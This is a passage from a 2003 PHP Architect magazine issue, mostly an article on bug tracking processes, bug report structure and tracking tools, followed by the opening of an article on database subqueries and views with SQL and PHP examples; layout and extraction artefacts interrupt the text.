where it is least expected. There are many software techniques that model how to take your software’s quality to a higher level, but that is way beyond the scope of this article. Here, we will try to concentrate on how to keep track of the bugs (and requests) in your project. We will also learn how to organize the development process so that most of the malfunctions in the software code are detected before final release and not by your customers. Life cycle of a bug The first thing you will always hear when discussing software testing and quality assurance is that the person who implements the code should not be the person who is testing it. There are few reasons for this statement. The first is that the person who is actually writing the code has his own mindset and cannot see the certain flaws in the design even if he looks at it for a very long time. Another person, who is actually only looking at the code’s behaviour, can easily spot things that the original writer missed. The second argument is rather psychological; the tester should act destructively against the code, which is very hard to do with your own work. We won’t go deeper into details about software testing,
REQUIREMENTS PHP: 4.0+ OS: N/A Applications: N/A Code Directory: N/A
19
FEATURES
Introduction to Bug Management
that could be the topic of some future article, but this story is very important in establishing roles in our bug management process. Three roles are necessary for successful bug tracking: • Developer – person who actually writes code and fixes bugs • Tester (QA staff) – person who tests the code and writes bug reports. This person, as we will see later, also verifies that the certain bug is fixed • Project manager – person who assigns certain properties to bugs (like we are going to see in the next section) and assigns them to developers for fixing Bug Life Cycle
example, we could introduce the following components for tracking bugs in the project: • Presentation layer – all bugs that are related to the user interface such as HTML code, client side code (JavaScript), etc. • Business layer – malfunctions in business scripts and classes • Data access layer – bugs in Data Object classes, SQL queries, database wrappers and so on So when QA reports the bug, the component attribute should address a certain project subsystem in order to make it easier for the project manager to assign it later.
QA submit bug report
Owner
Developer fixes the bug
Project manager reviews the bug report and assigns it if necessary
QA verifies that bug is fixed
Bug gets closed
The bug life cycle would look like this: quality assurance person finds the bug and submits the bug report. Project manager reviews every bug report. If he finds that the bug is valid, he assigns some attributes to the bug and assigns it to the appropriate developer. The developer than fixes the bug and assigns it to QA for verification. QA repeats the tests on a requirement and the bug gets closed or reopened depending on the problem’s presence in the system. Anatomy of a bug Now is a good time to see what bug attributes we need in order to successfully track our bugs. Components
Components help us to partition and decouple the whole project implementation and also make it easier to find who is in charge of the particular code base. You can divide the project vertically by encapsulating all the code that is solving the same problem domain (business logic) into a component (financial classes, address book and so on) or horizontally by making components of the particular application layers. Or you could do both. There are no strict rules. You should find the scheme that best suits your needs. For
September 2003
●
PHP Architect
●
www.phparch.com
Owner is the person who is responsible for the bug in some of the bug cycles. It could be a developer that is responsible for fixing the bug or a QA team member that should verify that a bug is really fixed. This way it is much easier for the project manager to see what bugs are currently unassigned and assign them appropriately. Severity
Severity is another important bug attribute that tells us how serious our bug is. Some common values are: • Stopper – This kind of bug is stopping either the client in software usage or further development (e.g. crashes, bugs in database wrapper that disables the whole project from connecting to database, etc.) • Critical – serious bug that causes heavy program malfunctions (e.g. bug in a core library that causes other subsystems to act unstable) • Major – ‘major’ bugs make our software unreliable and can cause serious damage to us or our clients (e.g. bad data calculation in some cases that makes the data unreliable) • Normal – bugs that are not serious but are unpleasant to our clients (e.g. broken links in pages) • Minor – small bugs that are not crucial for core program execution, but should be fixed in order to make better quality of the product (e.g. bad label for a form field)
20
FEATURES
Introduction to Bug Management
• Enhancement – this is not a real bug, but a request for a new feature
bugs that are reported to these two versions because it is often a completely different code base.
Priority
Priority is the attribute that is assigned by the project manager and helps developers organize their tasks. It’s a common practice to have five priority levels and the bugs with higher priorities should be fixed first. Status
Status is directly connected with bug life cycle. It tells us in what stage of the bug cycle our bug currently resides. Some commonly used values are: • New – bug has been reported, but not yet reviewed • Assigned – bug has been reviewed by project manager and assigned to particular developer • Fixed – bug has been fixed by development team and has to be reviewed by QA • Verified (Closed) – QA has verified that the bug has been fixed • Reopened – QA have run tests against the bug that was marked as fixed, and some problems still remain, so it is sent back to development for further repair • Duplicated – this bug has already been reported • Won’t fix – these are so called “known bugs” that are not going to be fixed in this development cycle, mostly because of a great risk involved in fixing the bug or the required time for that job • Invalid – Problem that is reported is not a bug • Works for me – Problem that has been reported couldn’t be reproduced so it is put in the repository for later analysis Subject
Every bug report should have a subject attribute for easier browsing and querying. Milestone
The software development process is often divided into smaller iterations called milestones. We should keep track of the project milestone that a bug has been reported to and for which it has to be fixed. We can demonstrate this by imagining that we have delivered version 1.2 of the project to the client and continued to work on the next release (1.3). We need a way to separate
September 2003
●
PHP Architect
●
www.phparch.com
Comments
Comments are a very important and useful attribute of the bug. We should always allow our team members to enter an unlimited number of comments to the bug. Doing so will allow us to keep track of the communication and history of the bug. An initial comment for the bug could be a description of the problem that QA (or the client) has found in our software. Attachment
In some development organizations a very limited number of developers can commit changes to the code repository. In this case, the bug’s attachment attribute is used to add patches of code that fixes bugs. Attachment can also be used for many other purposes like screen shots, test cases and all material that helps to document the bug properly. The bug attributes described above are just a small subset of commonly used attributes in the project. You should, of course, adjust these attributes to the specifics of your individual project and process. Some additional attributes that can be useful to describe the bug are web browser (particularly interesting for web application development), URL of the page in which bug appears, operating system (for platform specific problems) and many, many more. Now that we know how to define our bugs, we should mention the process of collecting new feature requests for our project. This process is sometimes very closely related to the bug management process. When we were talking about the bug status attribute earlier, we said that special status could be introduced to separate the bug from a request for enhancement (RFE). Basically a feature request could have a very similar structure to the bug report and, since many bug tracking tools support this functionality, it is natural (to some point) to keep track of enhancement requests in the same repository as bugs. Bug reports OK, we have now discussed some basic information about the structure and life cycle of bugs. This information, however, is not enough for a successful bug tracking process. In order to make your process efficient, the QA department
21
FEATURES
Introduction to Bug Management
needs to supply useful bug reports to the development team. The more information developers have to work on, the sooner the bug will be traced and fixed. When submitting a bug report, there are a few things to keep in mind. First things first, a basic rule in any bug tracking process is to always try to repeat the bug before submitting the report. This is very important because some bugs occur only under very specific circumstances and environment settings. You must be sure that you know the specific environment variables and steps that lead to the malfunction that you are going to submit. Of course, some bugs are almost impossible to trace, but even then you should make it easier for the developer by pointing him to all of the things that failed to repeat it. That way we can save some time by not duplicating effort, and it gives certain clues to the development team about what could be the problem. Let’s take a look now at what makes a good report. We can start by showing one bad example and go through to see how to make it better. Let’s say that a report like this is submitted: When I inserted some customer data and clicked on the “Save changes” button, an error page was displayed.
When a developer gets a message like this, the only thing he knows is that some problem exists in the process of adding a new customer. He can’t begin fixing the problem without actually contacting the person that submitted this report because he hasn’t a clue where to start. So, the usual questions end up being asked: What error was displayed? What data did you submit? On what page did the error occur? In 99% of the cases, the submitter doesn’t remember all the details because it was a “century” ago, and we’re trapped in an infinite loop. But, if we use another approach and submit a report like this, everything could be very different: • Operating system: Windows XP • Browser: Mozilla 1.3 • URL: http://someproject.someurl/1/customer_add.php • Component: Address book • Version: 1.0 • Subject: Add a new customer • Brief description: submitting of a new customer with the regular data failed • Steps: Log in Click the link to the address book September 2003
●
PHP Architect
●
www.phparch.com
•
•
•
•
Click” Add new customer” button Enter the data (see “data” section) Click “Save changes” button Data: Name: Dejan Bosanac Email:
[email protected] Title: Software developer All other fields: empty (default) Expected results: The data is submitted to the database and “view” page for the customer is displayed Actual results: Error page with a message “Error executing SQL query: phone_number field cannot be NULL” Conclusion: Problem is probably in bad JS validation for phone number field under Mozilla browser
With a report like this, the developer could spot the problem in a moment and fix it. Most of the fields (attributes) in this report have been described in the basic bug anatomy, so it is likely that your bug-tracking solution will support them. All the specific data of the problem should be put as the comment or the attachment to the bug. We can now summarize what a good report should consist of: 1. Brief description of the problem 2. Environment under which problem occurs 3. Steps needed to reproduce the problem 4. Specific inputs that caused the problem 5. pected and actual results 6. Summary of what the problem could be Of course, details of the each step depend on what the specific problem is. For example, if the bug is found during unit testing, input data should be the test case that caused the bug (you can attach the test class that caused the bug, if you want). Or, in another extreme case, if it is a visual (cosmetic) bug, all you have to submit is how to enter the specific page and what is wrong (environment-specific data is always useful). A general rule is that the more complex the problem is, the more information the developer is going to need. Bug tracking and development cycles For successful bug and request tracking there are a few more issues that you must keep in mind. The development cycle plays a key role in how the process is handled. It can be divided into three sections: • Development - implementation of the system functionality, resulting in huge
22
FEATURES
Introduction to Bug Management
changes to the codeset • Code freeze – software has entered beta testing phase and code is usually frozen • Release planning – preparations for the next project release are under way In order to have an efficient development process, we will look at how to use the bug-tracking system in each of these phases. In the development phase, good practice dictates that developers create test cases at the same time they write the code. A test case is code that is written to test certain functionality and to report the error if it is found. This way, we will actually have the confirmation that the software is doing the job for which it is meant. These test cases are normally grouped in a test suite that is executed regularly (preferably every night). This type of testing is called regression testing. We will not get into this in this article, but it is important to mention it because it affects the bug tracking process itself. Some authors say that in this stage of development we should not use a bug-tracking system as a repository for bug issues, as our test suite would keep this information for us. The would advise, though, to use a bug-tracking system for storing features that will be introduced later in the process. While this may true to some point, some errors cannot be detected with regression testing. Defects that are found during code reviews, user experience issues, and visual defects are just some of the bugs that we must handle outside of a test suite. So, my opinion is that in this phase we shouldn’t really submit duplicate reports to the system, but all the other issues that are reported during testing should be stored. If we don’t do this, we can easily forget about them until it is too late. Of course, if you don’t have automated testing introduced into your process, you should keep all the issues this way. Feature requests are always good to be stored in the system for later analysis. In the code freeze (beta testing) phase, the code is usually frozen and no immediate changes can be done. Now, we should keep track of all found malfunctions so that they can be fixed before the final release. It is also convenient to keep track of a user’s feature requests (usually beta testers are potential future users). At this point, we should introduce a request “grade”. In other words, we should keep track of how many requests we have for each feature, so we can easily separate the must-have features from the eccentric ones. When you are ready to start planning the next release, you could use the information stored in your tracking system. According to the request grade you can decide what features will become
September 2003
●
PHP Architect
●
www.phparch.com
part of the next release. One more thing is important in this stage: you must estimate the effort needed to implement certain features. For example, if some feature is a must-have feature and it requires minor code changes, then it should definitely be planned for the next release. In the case where the feature implementation requires huge code refactoring and involves great risk, you should think of delaying those features to some future release. When you have specifications for future releases, you should build the test cases for them and mark those requests as closed (remove them from the system). Bug tracking tools To start implementing organized bug management in your organization, you merely need concrete bug-tracking software. You could use a well-defined sheet in Excel-like software. You will soon see, however, that it would be much more efficient if you had just a little more. Many companies decide to build their own solutions, often seriously underestimating the effort for such a task. Many start with no clear idea of what they really want or need, and start coding a solution with minimal requirements. Soon after, they realize that maintenance and improvements to the solution are not cost effective by any means, and that costs of later porting to some commercial solution are much higher then it would have be in the start. Even if you have a small budget, it is not really hard to find a free solution in today’s open source software initiative. Many of these solutions will save you enormous time and manpower compared to building your own solution. That way, your developers can focus on building the project that needs the bug tracking process and not the particular tool itself. So, let’s start talking about what the defecttracking tool needs to provide you. How to choose the right tool for you? Before starting your search for a bug-tracking tool, you should have a clear vision of your bug tracking process so you can choose the tool that will have all the necessary requirements to meet your needs. Let’s divide the requirements into two basic groups: business requirements and technical requirements. Business requirements First of all, you should fit the tool into your current company profile and budget. There are various systems on the market with a wide price range, so you should start by positioning yourself into a group
23
FEATURES
Introduction to Bug Management
that you can currently afford. If your budget is small, don’t worry, there are many very nice opensource solutions. There are also companies that allow you to outsource this service to them for a reasonable amount. Second, you should know who the users of the bug management system will be, and if they have any specific needs. You will also need to be aware of how many users will be using the system, as well as their locations. The price of the bug management tool is often related to this information. You can divide users into two large groups. Internal users • QA staff will submit and query reports to find bugs that need to be verified • Developers will query reports to find assigned tasks • Project manager will query reports to find unassigned bugs, and also run metrics on the data External users • Customers • Clients • Beta Testers External users may like to submit enhancement requests or bugs, and see the progress and status of certain issues. In this case, you will probably be searching for a tool that can be exposed to the web for external (and, of course, internal) users. This leads us to the question of security. Does the potential tool allow the creation of groups of users, as well as the separation of their privileges on actions and data? We might want to only allow external users to query a small subset of all issues (for example, only those that they have entered), and allow them only to submit new reports, but not allow them to modify existing data. We could, of course, enable only some groups to submit reports, but I think that it would be better to allow all users to submit, as fewer bugs will be missed that way. We could also expect that only project management staff could change details such as severity and priority. All of these decisions are up to you. Usability of the system is another important parameter. Does the potential tool define the bug workflow that you need? Could it be configured? Does the bug submission form have all of the attributes that you need? Could it be configured? It is very important for the tool to be easy to use, as that will minimize the resistance to the tool by team members that may jeopardize the whole process. You should also consider whether the tool
September 2003
●
PHP Architect
●
www.phparch.com
supports various methods of notification when a bug status changes. Does the software send email, SMS messages, or have any other advanced techniques for notification. You may want the project manager to be immediately notified when a new critical bug report arrives, or you could enable your customers to be alerted when a certain bug is fixed. Administration concerns are the last issue that we will mention for the business requirements. We should know if we have someone who has skills that are needed for successful deployment, configuration, and maintenance of the system and how much time it is going to take aside from their regular duties. If this is a problem, then employing another person for this task must be considered. The administration of the bug management tool is usually the responsibility of project and network/database administrators. Technical requirements Technical requirements for defect tracking software are basically the same as for all other software products. • Reliability – software is stable and takes care of data consistency • Robustness – software behaves well in extreme conditions and large data volumes • Programmability – software has an application programming interface (API) through which it can be extended to your particular needs • Security – software gives needed security for the data and has no security flaws that can be easily exploited • Supportability – software vendor gives fair technical support for their product • Scalability – software is adaptable to your particular needs These are just basic technical concerns. You should also consider your current environment and skills. For example, does the product support database servers that you are comfortable with (MySQL, Sybase, Oracle, etc.)? Does the server code (in client/server and web-based solutions) suit your current development environment (Linux, Windows 2000, …), or will you need to prepare a new server for it? There are many factors to consider when choosing the perfect solution. Just one tip for the end, you should actually try every solution that seems to suit, since you won’t necessarily find the flaws just by reading the product specification.
24
FEATURES
Introduction to Bug Management
Some popular solutions As I said before many software packages are built for this specific need. We will mention two common ones - the further hunt is up to you. • Bugzilla (http://www.mozilla.org/projects/bugzilla/) – this product has its genesis in the opensource Mozilla web browser. It is written in Perl to replace an old bug tracking system used internally for Netscape Communications. It quickly became the defacto standard in the open source community, so you can see it in action on many projects on the web. Unix-like environments are natural for this software, and it is very well integrated with MySQL (but that’s the only database server that is currently supported). The source code comes under a mix of various licence policies that include the Netscape Public License (NPL), the Mozilla Public License (MPL), the GNU General Public License (GPL) and the GNU Lesser General Public License (LGPL). Some features worthy of note: – Integrated, product-based granular security schema – Inter-bug dependencies and dependency graphing – Advanced reporting capabilities – A robust, stable RDBMS back-end – Extensive configurability – A very well-understood and wellthought-out natural bug resolution protocol – Email, XML, console, and HTTP APIs – Available integration with automated software configuration management systems, including Perforce and CVS (through the Bugzilla email interface and checkin/checkout scripts) There are also some drawbacks that will be addressed in the future: – Reliance on only single database server (MySQL) – Rough user interface – Spartan email notification templates – Little report configurability – Some unsupported bug statuses – Little support for internationalisation – Dependence on some non-standard libraries
September 2003
●
PHP Architect
●
www.phparch.com
• Elementool (http://elementool.com) - It is possible these days to outsource your bug tracking to some other company. It is very convenient in situations when you don’t have, or can’t afford, more time and resources for the solution. All you need is a few minutes to set-up your account using your web browser, and you are ready to start. Also, this is an ideal solution for one-off projects because you can cancel your account at any time with no obligations. With this approach you don’t have any concerns regarding installing and updating your software, since you will always have the latest version ready for use. Their basic free package includes: – – – –
200 issue storage capacity Unlimited number of users Mail notifications Downloadable database for your own backup
For extra features like reports, history trail, customisable forms and so on, you must register for an advanced, commercial package.
These are just representatives of two approaches, you should really spend some more time to find a perfect solution for your needs. Closing word The aim of every professional software package is a satisfied customer. If you have an organized process for tracking bugs and feature requests in your project, you can be sure that less bugs will be detected by customers, and that the time cycle needed to fix those bugs (and track down new requirements) will be noticeably shorter. There are many tools available on the market that could help you organize your defects and requirements, but, before you start tracking them, be sure that you know what you need. Bug tracking is closely related to quality assurance issues and team organization, so it is important to start from there. Just try it; it’s easier than it sounds. About the Author
?>
Dejan Bosanac works as a fulltime software developer for DNS Europe Ltd (http://www.dnseurope.net) on the Billing software system for ISP's. In his spare time he also serves as a Lead Engineer at Noumenaut Software(http://www.noumenaut.com) on the online journaling project. He holds a Bachelor degree in Computer Science and currently is on the master studies in the same field.
Click HERE To Discuss This Article http://forums.phparch.com/45 25
Advanced Database Features Exposed
F E A T U R E
by Davor Pleskina
Databases have ceased to be a mystery. Designing and setting up databases and database-driven applications is no longer a terribly complicated task handled successfully only by specialists and technicians. Behind almost every site that consists of more than a product brochure is some kind of database from which information is retrieved and presented. lthough most web applications do not require highly advanced database servers, some of these servers provide more advanced features – such as subqueries, referential integrity, transaction handling, and support for stored procedures and triggers – which can make a developer’s life far easier. We will examine these aforementioned features from a higher level, giving examples of their use and usefulness, as well as showing how some of them can be simulated at a low level within PHP. Perhaps you have heard of some of these features, and maybe even used some of them. This article’s intent is to lower the bar for the uninitiated, and hopefully show you a right tool or two for the job. I mean, there is no sense trying to develop a semi-usable transaction handling system in PHP (which would be a difficult task indeed), when you could just use a database with transaction support built-in, right? As much as possible, I’ll try to avoid database specific code. To avoid presenting database-specific PHP examples, I am going to use the PEAR DB class. PEAR (the PHP Extension and Application Repository) is a free online PHP software repository, and can be found at http://pear.php.net. PEAR is usually installed automatically when you install PHP using common install packages. In all examples, we will assume that we are already connected to a database server, and that we already have a database connection handle which we are going to call $dbh. There will also be no error messages
A
September 2003
●
PHP Architect
●
www.phparch.com
specific to any RDBMS. As far as requisite knowledge for the article, we’ll assume a basic understanding of SQL, and go from there. Some Data We are going to need some real world tables and relationships to simulate situations in which our aforementioned advanced database features become necessary. Suppose we have two small tables, one containing data about our customers, and the other containing their addresses (we might expect a customer to have more than one address). These tables are going to contain a very small number of columns, and we will avoid specifying specific data types. Here are the table structures we’ll work with: CUSTOMER table: CUSTOMER_ID FIRST_NAME LAST_NAME GENDER ADDITIONAL_INFO LAST_CHANGE
...continued
REQUIREMENTS PHP: 4.0+ OS: N/A Applications: N/A Code Directory: advanced_db
27
FEATURES
Advanced Database Features Exposed
ADDRESS table: ADDRESS_ID CUSTOMER_ID STREET CITY POSTAL_CODE STATE COUNTRY LAST_CHANGE
DELETE FROM CUSTOMER WHERE NOT EXISTS (SELECT CUSTOMER_ID FROM ADDRESS WHERE CUSTOMER.CUSTOMER_ID = ADDRESS.CUSTOMER_ID)
It may be apparent that CUSTOMER_ID is going to be our customer’s unique identification number, as well as that table’s primary key. Other information that we will store about the customer includes first and last name, gender, and any desired additional info. The last column in the CUSTOMER table represents the date of the last change made to a specific customer’s information. The ADDRESS table can hold more than one address for a single customer. The unique identifier and primary key for each address is stored in a column named ADDRESS_ID. This table must also contain a reference to the appropriate customer, and this is found in the CUSTOMER_ID column. Specific address data is also stored, including the street, city, postal code and country columns, while the last column again holds information about when the specific record last changed. Subqueries You can think of subqueries (or sub-SELECTs) as SELECTs within other SELECTs. A simple example could look like:
SELECT something FROM table_1 WHERE something IN ( SELECT something_else FROM table_2 WHERE something_else LIKE ‘more conditions’ )...
Let’s look at a demonstration of the importance and use of subqueries. Consider that from time to time we want to remove customers who do not have any addresses in our database. To do that without subqueries would require a number of steps. We would need to browse the CUSTOMER table record-by-record checking for matching records in the ADDRESS table, deleting the customers with none. An example of doing this with PHP is shown in Listing 1. Using a subquery, we could do all of this in one step with the following statement: September 2003
●
PHP Architect
●
www.phparch.com
As you can see, the subquery will perform a small join on CUSTOMER and ADDRESS. If the subquery doesn’t return a row for a particular customer, it means that there are no addresses in the ADDRESS table, and the customer can be deleted. What a job done in only one statement! The statement could also have been written using IN operator like Listing 1 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
// Get customer ID $customer_id = $row_customer [‘CUSTOMER_ID’] // Count addresses $result = $dbh->query ($query_check_address. ”’$customer_id’”); $row = $result->fetchRow()); // Get number of addresses $count = $row[‘CNT_ADDRESS’]; if ($count < 1) { // No addresses, delete the customer $dbh->query ($query_delete_customer. ”’$customer_id’”); }
28
FEATURES
Advanced Database Features Exposed
DELETE FROM CUSTOMER WHERE CUSTOMER_ID NOT IN (SELECT CUSTOMER_ID FROM ADDRESS)
This is a different approach to doing the same job, but returns and checks more data for each customer, which is not recommended when the tables involved store a large amount of data. In such cases, EXISTS is a more suitable operator.. If your applications use very complex SQL statements to retrieve data, you can also simplify them, and avoid joining too many related tables, by using subqueries to retrieve single data column from related tables. Note the following two statements, which both return the same result: SELECT CUSTOMER.CUSTOMER_ID COUNT (ADDRESS.*) AS NO_OF_ADDRESSES FROM CUSTOMER, ADDRESS WHERE CUSTOMER.CUSTOMER_ID = ADDRESS.CUSTOMER_ID GROUP BY CUSTOMER.CUSTOMER_ID SELECT CUSTOMER.CUSTOMER_ID, (SELECT COUNT (*) FROM ADDRESS WHERE CUSTOMER.CUSTOMER_ID = ADDRESS.CUSTOMER_ID) AS NO_OF_ADDRESSES FROM CUSTOMER
In both cases, the customer’s ID and count of related addresses is returned; however, in the first statement we had to group data using the GROUP BY clause, which is in most cases a slow operation on large tables. In the second statement, we executed small and quick subquery (it is quick because it retrieves only related data from the ADDRESS table for each customer and counts it using the table’s primary keys) thereby avoiding joining and grouping. Although, on first sight, the second statement would now look more complex than the first one, think what would it look like if we had to join and group more than two tables with many fields – there would appear many field names in the WHERE and GROUP BY clauses, and the SELECT list would look much more complicated. Field name conflicts could also appear, and we would be forced to assign the table name to each field which appears more than once. We should also mention that all field names in a subquery are local to that statement, and we do not need to worry about conflicts with field names in the main statement.
September 2003
●
PHP Architect
●
www.phparch.com
If your statements are complex, the use of subqueries can often help with their simplification. This is not to say that there are not good reasons to use each of these other methods. Depending on the SQL statement’s complexity, the number of joined tables, and the amount of data processed, each method will act differently. Views A view is a virtual table which does not physically exist. It is defined as a query on one or more tables and stored in the database definition as an SQL statement. You can do any kind of SELECT from a view, and use it in any SQL statement just as you would any physical table. Views can sometimes be updated and deleted from, but whether a view is updateable or not depends on the complexity of its SQL definition and join conditions. Views can be created, altered, or dropped just like regular tables. Let’s return to our problem of counting a customer’s addresses from table ADDRESS. Instead of doing a subquery or creating a temporary table to hold the counts of all addresses for each customer we could simply create a view like this one: CREATE VIEW CUSTOMER_ADDRESS_COUNT AS SELECT CUSTOMER_ID, COUNT (*) AS NO_OF_ADDRESSES FROM ADDRESS GROUP BY CUSTOMER_ID
We have defined a virtual table named CUSTOMER_ADDRESS_COUNT, which contains one row for each customer with his addresses counted in field NO_OF_ADDRESSES. Now we can select data from the view by issuing a statement like SELECT * FROM CUSTOMER_ADDRESSES_COUNT
We will get a set of rows containing CUSTOMER_ID and NO_OF_ADDRESSES for each customer, just like we did with the previous SQL statements that used subqueries or joins. Having this view defined, we could now repeat our address count check from Listing 1, avoiding the $query_check_address SQL statement. Better than that, our main query can be changed so that it returns only customers with no addresses: SELECT * FROM CUSTOMER, CUSTOMER_ADDRESS_COUNT WHERE CUSTOMER.CUSTOMER_ID = CUSTOMER_ADDRESS_COUNT.CUSTOMER_ID AND NO_OF_ADDRESSES = 0
29
FEATURES
Advanced Database Features Exposed
Listing 2 1
Listing 3 1